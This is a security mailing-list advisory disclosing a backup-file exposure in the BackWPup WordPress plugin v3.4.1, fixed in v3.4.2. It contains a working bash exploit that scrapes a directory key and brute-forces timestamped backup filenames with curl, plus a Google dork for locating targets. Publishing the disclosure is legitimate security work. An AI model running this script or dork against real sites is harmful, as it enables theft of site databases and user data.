[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 27 Sep 2017 12:13:47 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute
forcing of backup file download
Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID:[CVE-2017-2551]
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact: plugins@...dpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but
it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings.
Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp. It would take a Maximum of 86400 tries to guess if a backup is available for that day.
Filename format:
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s
Default settings are:
%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second
https://wordpress.org/plugins/backwpup
Exploit Code:
• #!/bin/bash
• #Exploit for Wordpress Plugin BackWPup v3.4.1
• #Download https://wordpress.org/plugins/backwpup
• #CWE-552: Files or Directories Accessible to External Parties
• #CVE-ID: CVE-2017-2551
• #Google Dork: inurl:wp-content/uploads/backwpup
•
•
• #Add banner about vulnerability
•
• KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
•
• #Add error checking here
• echo "[+] Getting Unique Key $KEY"
• DIR="backwpup-$KEY-backups"
• echo "[+] Checking directory $DIR"
• WPATH="$DIR/backwpup_$KEY"
• echo "[+] Creating Path: $WPATH"
• #use date command here for the default date of current day
• MONTH=09
• DAY=07
• YEAR=2017
• Z=0
•
• echo "[+] Scanning website for available backups:"
• for y in `seq -w 0 23`; do
• for x in `seq -w 0 59`; do
• Y=`echo "scale=2;($Z/86000)*100"|bc`;
• echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
• for z in `seq -w 0 59`; do
• Z=$(( $Z + 1 ));
• CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
• RESULT=`curl -s --head $CWPATH|grep 200`;
• if [ -n "$RESULT" ]; then
• echo ""
• echo "[+] Location $CWPATH Found";
• echo "[+] Received $RESULT";
• echo "Downloading......";
• # wget $CWPATH
• exit;
• fi;
• done
• done
• done
• echo "Completed."
Screen Shots:
Notes: Google Dork: inurl:wp-content/uploads/backwpup
Powered by blists - more mailing lists
Please check out the
Open Source Software Security Wiki, which is counterpart to this
mailing list.
Confused about mailing lists and their use?
Read about mailing lists on Wikipedia
and check out these
guidelines on proper formatting of your messages.
